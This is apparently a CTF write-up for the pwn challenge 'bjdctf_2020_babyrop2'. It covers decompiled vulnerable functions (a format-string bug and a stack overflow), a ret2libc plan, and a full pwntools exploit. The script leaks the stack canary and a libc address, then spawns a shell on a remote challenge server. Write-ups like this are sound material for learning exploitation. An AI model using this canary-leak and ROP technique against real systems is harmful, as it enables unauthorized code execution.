
bjdctf_2020_babyrop2

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop2/bjdctf_2020_babyrop2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found //Canary保护
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

gift()

/*
 * gift(): decompiled from the challenge binary.
 * Reads at most 6 characters into `format` and then hands that buffer to
 * printf() as the *format string* (CWE-134, externally controlled format
 * string). The canary copy `v2` lives at rbp-8, directly above `format`,
 * so the bug discloses stack contents; the writeup below uses it to read
 * the canary back. The fix is printf("%s", format) (or puts(format)),
 * which prints the text without interpreting conversions.
 * Returns the stack-protector check value (canary XOR saved copy).
 */
unsigned __int64 gift()
{
char format[8]; // [rsp+0h] [rbp-10h] BYREF   -- stdin-controlled; later used as the printf format
unsigned __int64 v2; // [rsp+8h] [rbp-8h]   -- local copy of the stack canary
 
v2 = __readfsqword(0x28u); // load canary from fs:0x28
puts("I'll give u some gift to help u!");
__isoc99_scanf("%6s", format); // bounded read: "%6s" writes at most 6 chars + NUL into the 8-byte buffer
printf(format); // BUG: format string comes straight from the user
puts(byte_400A05);
fflush(0LL);
return __readfsqword(0x28u) ^ v2; // stack-protector epilogue check
}

vuln()

/*
 * vuln(): decompiled from the challenge binary.
 * read() is asked for up to 0x64 (100) bytes, but `buf` is only 24 bytes
 * (stack-based buffer overflow, CWE-121). The canary at rbp-8 is the only
 * thing between the end of `buf` and the saved rbp / return address, so
 * once the canary value is known (see gift() above) the overwrite is not
 * detected. The fix is to bound the length by the buffer:
 * read(0, buf, sizeof(buf)).
 * Returns the stack-protector check value (canary XOR saved copy).
 */
unsigned __int64 vuln()
{
char buf[24]; // [rsp+0h] [rbp-20h] BYREF   -- 24-byte buffer, 0x18 bytes below the canary
unsigned __int64 v2; // [rsp+18h] [rbp-8h]   -- local copy of the stack canary
 
v2 = __readfsqword(0x28u); // load canary from fs:0x28
puts("Pull up your sword and tell me u story!");
read(0, buf, 0x64uLL); // BUG: length 0x64 exceeds sizeof(buf) == 24 -> stack overflow
return __readfsqword(0x28u) ^ v2; // stack-protector epilogue check
}

0x02


思路 ret2libc

1.利用printf泄露canary

计算偏移

canary 在rbp-0x8

在printf处下断点

pwndbg> p $rbp-0x8

$1 = (void *) 0x7fffffffdc38

pwndbg> fmtarg 0x7fffffffdc38
The index of format argument : 7 ("\%6$p")

2.利用read()泄露libc

3.计算system()和/bin/sh

4.再次溢出执行system()

0x03


exp

"""Exploit script from the writeup for bjdctf_2020_babyrop2 (BUUOJ).

Three stages, each mapped to a bug shown in the decompilation above:
  1. the format-string bug in gift() echoes a stack slot, recovering the canary;
  2. the read() overflow in vuln() calls puts(puts@got) and returns to main,
     leaking a libc address;
  3. the same overflow is used again to return into system("/bin/sh")
     computed from that leak.
Defender's takeaway: a stack canary does not help once it can be read back.
The root-cause fixes are printf("%s", fmt) in gift() and a read() length
bounded by sizeof(buf) in vuln().
"""
from pwn import *

# log_level='debug' makes pwntools print every send/recv, handy for seeing
# exactly what each io.recv() below consumed.
context(arch='amd64', os='linux', log_level='debug')
io = remote('node4.buuoj.cn', 27318)
path = './bjdctf_2020_babyrop2'
# NOTE(review): presumably the libc shipped with the Ubuntu 16 environment named at the top of the page -- confirm it matches the remote.
libc = ELF('./libc-2.23.so')
# io = process([path])
elf = ELF(path)
io.recv()  # consume the gift() prompt
# buf is at rbp-0x20 and the canary at rbp-0x8 (see vuln()): 0x18 bytes of filler precede the canary.
padding = 0x20 - 0x8
# Positional format argument 7 is the stack slot holding the canary (fmtarg output above reports index 7).
payload = flat(b'%7$p')
io.sendline(payload)
# "%p" prints "0x" + hex digits; 18 chars assumes a 16-digit canary -- TODO confirm this holds on every run.
canary = int(io.recv(18), 16)

print('[+] Canary -->', hex(canary))
# Gadget address is fixed because the binary is not PIE (checksec above: No PIE, base 0x400000).
pop_rdi_ret = 0x400993 # pop rdi ; ret
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
# Stage 2 frame layout: filler | canary | saved rbp | pop rdi; ret | puts@got | puts@plt | main
payload1 = flat(b'a'*padding, canary, b'a'*0x8, pop_rdi_ret, puts_got, puts_plt, main)
delims2 = b'Pull up your sword and tell me u story!\n'
io.sendlineafter(delims2, payload1)


# puts() prints the raw 8-byte GOT entry up to its first NUL; keep the 6 bytes ending
# in the 0x7f high byte and zero-extend to a full 64-bit value.
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print('[+] puts_addr -->', hex(puts_addr))

# Rebase symbols from the provided libc onto the leaked address.
libc_base = puts_addr - libc.symbols['puts']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
print('[+] libc_base -->', hex(libc_base))
print('[+] system -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))

# main ran again, so gift() prompts a second time; answer it and discard the output.
io.recv()
io.sendline(payload)
io.recv()
# Stage 3 reuses the canary read in stage 1 -- valid as long as this is still the same process.
payload2 = flat(b'a'*padding, canary, b'a'*0x8, pop_rdi_ret, bin_sh, system)
io.sendline(payload2)
io.interactive()

